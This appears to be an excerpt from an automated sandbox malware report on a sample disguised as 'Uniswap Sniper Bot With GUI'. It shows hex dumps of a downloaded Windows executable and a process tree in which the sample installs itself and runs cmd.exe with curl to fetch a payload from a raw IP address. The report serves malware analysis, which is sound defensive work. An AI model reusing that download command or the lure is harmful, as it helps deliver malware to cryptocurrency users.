2024-12-13 08:39:02 UTC	1378	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ef 12 c0 5b ab 73 ae 08 ab 73 ae 08 ab 73 ae 08 ce 15 ad 09 a1 73 ae 08 ce 15 ab 09 24 73 ae 08 f9 1b aa 09 b8 73 ae 08 f9 1b ad 09 b8 73 ae 08 f9 1b ab 09 80 73 ae 08 ce 15 aa 09 be 73 ae 08 ce 15 a8 09 a9 73 ae 08 ce 15 af 09 ba 73 ae 08 ab 73 af 08 e5 72 ae 08 0e 1a ab 09 e0 73 ae 08 0e 1a 51 08 aa 73 ae 08 ab 73 39 08 a9 73 ae 08 0e 1a ac 09 aa 73 ae 08 52 69 63 68 ab 73 ae Data Ascii: MZ@!L!This program cannot be run in DOS mode.$[ssss$ssssssssrsQss9ssRichs
2024-12-13 08:39:02 UTC	1378	IN	Data Raw: 8b 45 08 83 c0 fc 50 ff 15 f8 b0 44 00 5d c2 04 00 55 8b ec 51 53 56 57 33 f6 56 56 6a 01 56 89 75 fc ff 15 ec b0 44 00 68 28 b5 44 00 ff 15 f0 b0 44 00 8b d8 68 3c b5 44 00 53 ff 15 f4 b0 44 00 8b 3d e8 b0 44 00 85 c0 74 0d 68 00 08 00 00 ff d0 85 c0 75 39 ff d7 68 58 b5 44 00 53 ff 15 f4 b0 44 00 85 c0 74 0b 68 24 b5 44 00 ff d0 85 c0 75 02 ff d7 39 75 0c 76 15 8b 7d 08 8d 45 fc 50 ff 34 b7 e8 0d 27 00 00 46 3b 75 0c 72 ee 5f 5e 5b c9 c2 08 00 33 c0 50 50 6a 01 50 ff 15 ec b0 44 00 c3 55 8b ec 51 51 56 57 33 ff 8d 45 fc 57 68 6c b5 44 00 50 89 7d fc 89 7d f8 e8 fb 0d 00 00 8b f0 85 f6 78 62 57 ff 75 08 8d 45 fc 50 e8 e8 0d 00 00 8b f0 85 f6 78 4f 8d 45 f8 50 ff 75 fc ff 15 3c b3 44 00 85 c0 75 2d ff 15 e8 b0 44 00 8b f0 85 f6 7e 0b 0f b7 f6 81 ce 00 00 Data Ascii: EPD]UQSVW3VVjVuDh(DDh<DSD=Dthu9hXDSDth$Du9uv}EP4'F;ur_^[3PPjPDUQQVW3EWhlDP}}xbWuEPxOEPu<Du-D~
2024-12-13 08:39:02 UTC	1378	IN	Data Raw: 74 0a be 57 00 07 80 e9 88 00 00 00 83 fb 01 77 29 39 75 14 0f 84 a6 00 00 00 8b 7d 10 80 3f 00 8b 7d 0c 0f 84 97 00 00 00 8b f0 f7 de 1b f6 83 e6 23 81 c6 57 00 07 80 eb 5a ff 75 14 21 75 0c 8d 45 0c ff 75 10 50 53 ff 75 fc e8 4e 06 00 00 8b 55 fc 8b f0 03 55 0c 2b 5d 0c 89 55 fc 89 5d f4 85 f6 78 26 8b 4d 20 f7 c1 00 02 00 00 74 53 83 fb 01 76 4e 8d 43 ff 50 0f b6 c1 50 8d 42 01 50 e8 c6 df 02 00 83 c4 0c eb 35 8b 45 08 8b 55 f8 8b 4d 20 f7 c1 00 1c 00 00 74 18 85 ff 74 14 51 8d 4d f4 51 8d 4d fc 51 52 57 50 e8 a2 06 00 00 8b 5d f4 85 f6 79 08 81 fe 7a 00 07 80 75 15 8b 55 fc 8b 45 18 85 c0 74 02 89 10 8b 45 1c 85 c0 74 02 89 18 5b 5f 8b c6 5e c9 c2 1c 00 55 8b ec 83 ec 10 8b 45 20 56 25 00 01 00 00 57 8b 7d 0c 89 45 f0 74 3c 8b 4d 08 33 c0 8b f0 85 c9 Data Ascii: tWw)9u}?}#WZu!uEuPSuNUU+]U]x&M tSvNCPPBP5EUM ttQMQMQRWP]yzuUEtEt[_^UE V%W}Et<M3
2024-12-13 08:39:02 UTC	1378	IN	Data Raw: 89 11 8b 4d 1c 85 c9 74 0d 89 01 eb 09 85 ff 74 05 33 c0 66 89 03 5f 8b c6 5e 5b c9 c2 1c 00 55 8b ec 8b 45 0c 33 c9 85 c0 74 07 3d ff ff ff 7f 76 05 b9 57 00 07 80 85 c9 78 17 68 fe ff ff 7f ff 75 10 6a 00 50 ff 75 08 e8 44 01 00 00 8b c8 eb 0c 85 c0 74 08 8b 45 08 33 d2 66 89 10 8b c1 5d c2 0c 00 55 8b ec 83 7d 08 00 56 8b 75 10 74 17 81 7d 0c ff ff ff 7f 77 0e 56 ff 75 0c ff 75 08 e8 a6 02 00 00 eb 05 b8 57 00 07 80 85 c0 79 07 85 f6 74 03 83 26 00 5e 5d c2 0c 00 55 8b ec 83 7d 08 00 56 8b 75 10 74 17 81 7d 0c ff ff ff 7f 77 0e 56 ff 75 0c ff 75 08 e8 b3 02 00 00 eb 05 b8 57 00 07 80 85 c0 79 07 85 f6 74 03 83 26 00 5e 5d c2 0c 00 55 8b ec 8b 45 0c 56 33 f6 85 c0 74 07 3d ff ff ff 7f 76 05 be 57 00 07 80 85 f6 78 36 53 8b 5d 08 33 f6 57 ff 75 14 8d 78 Data Ascii: Mtt3f_^[UE3t=vWxhujPuDtE3f]U}Vut}wVuuWyt&^]U}Vut}wVuuWyt&^]UEV3t=vWx6S]3Wux
2024-12-13 08:39:02 UTC	1378	IN	Data Raw: 00 eb 2a 53 57 ff 75 08 e8 01 06 00 00 8b f0 85 f6 78 10 8b 45 0c 89 38 33 ff 8b 45 10 85 c0 74 0c 89 18 85 ff 74 06 57 e8 2a 19 00 00 5f 5b 8b c6 5e c9 c2 0c 00 55 8b ec 53 8b 5d 10 56 8b 75 0c 57 6a 00 8d 3c 75 02 00 00 00 57 53 e8 59 f2 ff ff 85 c0 78 0c 57 ff 33 56 ff 75 08 e8 19 06 00 00 5f 5e 5b 5d c2 0c 00 55 8b ec 51 53 56 8b 75 08 33 db 21 5d fc 57 33 ff 39 1e 74 30 ff 36 e8 8d 1a 00 00 8b d8 83 fb ff 75 0a bf 57 00 07 80 e9 8e 00 00 00 8d 45 fc d1 eb 50 68 ff ff ff 7f ff 36 e8 93 fa ff ff 8b f8 85 ff 78 76 8b 55 10 85 d2 75 1a 8d 45 10 50 68 ff ff ff 7f ff 75 0c e8 75 fa ff ff 8b f8 85 ff 78 58 8b 55 10 8b cb 8d 42 01 2b 4d fc 3b c8 73 18 8b 5d fc 43 6a 00 03 da 53 56 e8 c1 f1 ff ff 8b f8 85 ff 78 34 8b 55 10 8b 0e 85 c9 74 26 8d 34 12 8d 04 1b Data Ascii: SWuxE83EttW_[^US]VuWj<uWSYxW3Vu_^[]UQSVu3!]W39t06uWEPh6xvUuEPhuuxXUB+M;s]CjSVx4Ut&4
2024-12-13 08:39:02 UTC	1378	IN	Data Raw: 85 c0 78 15 68 00 02 00 00 6a 00 6a 00 57 ff 75 0c 56 ff 33 e8 4b f2 ff ff 5f 5e 5b 5d c2 0c 00 55 8b ec 51 56 8b 75 0c 8d 45 fc 50 6a 01 ff 36 e8 c4 f8 ff ff 85 c0 78 32 53 8b 5d 08 57 8b 7d fc 6a 05 6a 04 57 53 e8 06 13 00 00 85 c0 78 19 ff 75 14 8b 0e 8b 03 ff 75 10 8d 04 88 50 e8 7c fb ff ff 85 c0 78 02 89 3e 5f 5b 5e c9 c2 10 00 55 8b ec 56 33 f6 57 8b 7d 08 39 75 0c 76 18 83 3c b7 00 74 0c ff 34 b7 e8 68 13 00 00 85 c0 78 0c 46 3b 75 0c 72 e8 57 e8 58 13 00 00 5f 5e 5d c2 08 00 55 8b ec 5d e9 49 13 00 00 55 8b ec 53 8b 5d 08 56 57 53 ff 15 04 b1 44 00 8b f8 d1 ef 39 7d 10 73 17 be 7a 00 07 80 56 68 c1 05 00 00 68 b4 b5 44 00 e8 31 11 00 00 eb 34 33 f6 85 ff 74 2e 8b 75 0c 0f b7 03 50 e8 4e ed ff ff 8a d0 8d 5b 04 c0 e2 04 88 16 0f b7 43 fe 50 e8 3a Data Ascii: xhjjWuV3K_^[]UQVuEPj6x2S]W}jjWSxuuP\|x>_[^UV3W}9uv<t4hxF;urWX_^]U]IUS]VWSD9}szVhhD143t.uPN[CP:
2024-12-13 08:39:02 UTC	1378	IN	Data Raw: 45 f8 50 ff 75 fc ff 36 e8 6a f0 ff ff 8b d0 85 d2 78 20 8b 0e 8b 45 f8 57 6a 5c 5f 66 3b 7c 41 fe 5f 74 0f 6a 01 68 fc b7 44 00 56 e8 a2 f3 ff ff 8b d0 8b c2 5e c9 c2 04 00 55 8b ec 83 ec 10 53 8b 5d 0c 56 33 f6 8b ce 8b d6 0f b7 03 89 4d f4 89 4d fc 57 8b fe 66 85 c0 0f 84 17 01 00 00 6a 22 8b f0 c7 45 f0 5c 00 00 00 59 6a 20 58 66 3b c6 74 2d 6a 09 58 66 3b c6 74 25 6a 0a 58 66 3b c6 74 1d 6a 0b 58 66 3b c6 74 15 66 3b ce 75 06 33 ff 47 42 eb 0d 6a 5c 58 66 3b c6 75 05 eb f3 33 ff 47 83 c3 02 42 0f b7 03 8b f0 66 85 c0 75 ba 8b 4d f4 8b 5d 0c 85 ff 0f 84 b5 00 00 00 8d 42 03 50 8d 45 fc 50 e8 f2 f2 ff ff 8b f0 85 f6 0f 88 d4 00 00 00 8b 55 fc 6a 22 58 66 89 02 8b c3 83 c2 02 0f b7 00 66 85 c0 74 76 8b f8 33 c9 0f b7 c7 8b f1 66 39 7d f0 75 0f 6a 5c 5f Data Ascii: EPu6jx EWj\_f;\|A_tjhDV^US]V3MMWfj"E\Yj Xf;t-jXf;t%jXf;tjXf;tf;u3GBj\Xf;u3GBfuM]BPEPUj"Xfftv3f9}uj\_
2024-12-13 08:39:02 UTC	1378	IN	Data Raw: f4 f6 45 10 01 89 7d fc 0f 84 0b 01 00 00 6a 40 8d 45 fc c7 45 f4 40 00 00 00 50 e8 3d ee ff ff 8b f0 85 f6 0f 88 08 02 00 00 ff 75 f4 8b 3d 14 b1 44 00 ff 75 fc ff 75 0c ff d7 85 c0 75 33 ff 15 e8 b0 44 00 8b f0 85 f6 7e 0b 0f b7 f6 81 ce 00 00 07 80 85 f6 78 05 be 05 40 00 80 56 68 08 01 00 00 68 ac b7 44 00 e8 da 06 00 00 e9 c0 01 00 00 8b 5d f4 3b d8 73 62 50 89 45 f4 8d 45 fc 50 e8 d7 ed ff ff 8b f0 85 f6 0f 88 a2 01 00 00 ff 75 f4 ff 75 fc ff 75 0c ff d7 85 c0 75 26 ff 15 e8 b0 44 00 8b f0 85 f6 7e 0b 0f b7 f6 81 ce 00 00 07 80 85 f6 78 05 be 05 40 00 80 56 68 13 01 00 00 eb 9e 8b 5d f4 3b d8 73 0f b8 7a 00 07 80 50 8b f0 68 18 01 00 00 eb 88 3d 04 01 00 00 76 34 8d 45 fc 50 e8 0f 04 00 00 8d b0 a9 ff f8 7f f7 de 1b f6 23 f0 0f 8c 35 01 00 00 8d 45 Data Ascii: E}j@EE@P=u=Duuu3D~x@VhhD];sbPEEPuuuu&D~x@Vh];szPh=v4EP#5E
2024-12-13 08:39:02 UTC	1378	IN	Data Raw: 08 50 56 e8 e7 f1 ff ff 8b c8 85 c9 78 52 8b 4d 08 8d 41 fe 85 c0 74 32 85 ff 75 12 e8 d4 03 03 00 c7 00 16 00 00 00 e8 0c 03 03 00 eb 1c 3b c8 73 0d e8 be 03 03 00 c7 00 22 00 00 00 eb e8 50 57 56 e8 39 ba 02 00 83 c4 0c 6a 07 68 ec b7 44 00 53 e8 8a ea ff ff 8b c8 eb 05 b9 57 00 07 80 5f 5e 8b c1 5b 5d c2 04 00 55 8b ec 51 56 8b 75 0c 8d 45 fc 57 8b 7d 08 68 ff ff ff 7f 50 56 57 e8 fd 00 00 00 85 c0 78 27 81 7d 14 fe ff ff 7f 76 07 b8 57 00 07 80 eb 17 ff 75 14 8b 45 fc 2b f0 ff 75 10 6a 00 56 8d 04 47 50 e8 f8 e5 ff ff 5f 5e c9 c2 10 00 55 8b ec 51 56 8b 75 0c 8d 45 fc 57 8b 7d 08 68 ff ff ff 7f 50 56 57 e8 b0 00 00 00 85 c0 78 19 8b 45 fc 2b f0 68 fe ff ff 7f ff 75 10 6a 00 56 8d 04 47 50 e8 b9 e5 ff ff 5f 5e c9 c2 0c 00 55 8b ec 8b 45 0c 33 c9 85 c0 Data Ascii: PVxRMAt2u;s"PWV9jhDSW_^[]UQVuEW}hPVWx'}vWuE+ujVGP_^UQVuEW}hPVWxE+hujVGP_^UE3
2024-12-13 08:39:02 UTC	1378	IN	Data Raw: f3 85 f6 74 06 56 e8 62 fe ff ff 5f 5e 8b c3 5b 5d c2 10 00 bb 0e 00 07 80 53 6a 61 68 88 b8 44 00 e8 5d fc ff ff eb e3 55 8b ec ff 75 08 6a 00 ff 15 d4 b2 44 00 50 ff 15 5c b1 44 00 5d c2 04 00 55 8b ec 56 8b 75 14 85 f6 75 04 33 c0 eb 6d 8b 45 08 85 c0 75 13 e8 37 fe 02 00 6a 16 5e 89 30 e8 70 fd 02 00 8b c6 eb 53 57 8b 7d 10 85 ff 74 14 39 75 0c 72 0f 56 57 50 e8 1f af 02 00 83 c4 0c 33 c0 eb 36 ff 75 0c 6a 00 50 e8 0d ba 02 00 83 c4 0c 85 ff 75 09 e8 f6 fd 02 00 6a 16 eb 0c 39 75 0c 73 13 e8 e8 fd 02 00 6a 22 5e 89 30 e8 21 fd 02 00 8b c6 eb 03 6a 16 58 5f 5e 5d c3 55 8b ec 51 53 33 db 56 8b 75 08 8b c3 89 45 fc 57 8b fb 85 f6 74 37 66 39 1e 74 28 56 ff 15 80 b1 44 00 85 c0 74 1a 8d 45 fc 47 50 56 e8 a4 f8 ff ff 85 c0 78 0b 8b 45 fc 8b f0 85 c0 75 d8 Data Ascii: tVb_^[]SjahD]UujDP\D]UVuu3mEu7j^0pSW}t9urVWP36ujPuj9usj"^0!jX_^]UQS3VuEWt7f9t(VDtEGPVxEu

Target ID:	0
Start time:	03:35:53
Start date:	13/12/2024
Path:	C:\Users\user\Desktop\Uniswap Sniper Bot With GUI.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Uniswap Sniper Bot With GUI.exe"
Imagebase:	0x400000
File size:	74'110'256 bytes
MD5 hash:	EFBC268A345E5A3089CA0640353B98CC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Target ID:	2
Start time:	03:35:56
Start date:	13/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\system32\cmd.exe" /c tasklist /FI "USERNAME eq %USERNAME%" /FI "IMAGENAME eq uniswap-sniper-bot-with-gui.exe" /FO csv \| "C:\Windows\system32\find.exe" "uniswap-sniper-bot-with-gui.exe"
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	7
Start time:	03:36:19
Start date:	13/12/2024
Path:	C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe"
Imagebase:	0x7ff69ff50000
File size:	148'925'952 bytes
MD5 hash:	7EA968EDE8860D4069D51F9EDEEFB64C
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Target ID:	10
Start time:	03:36:24
Start date:	13/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /d /s /c "curl -Lo "C:\Users\user\AppData\Local\Temp\p.zi" "http://185.153.182.241:1224/pdown""
Imagebase:	0x7ff7e9210000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true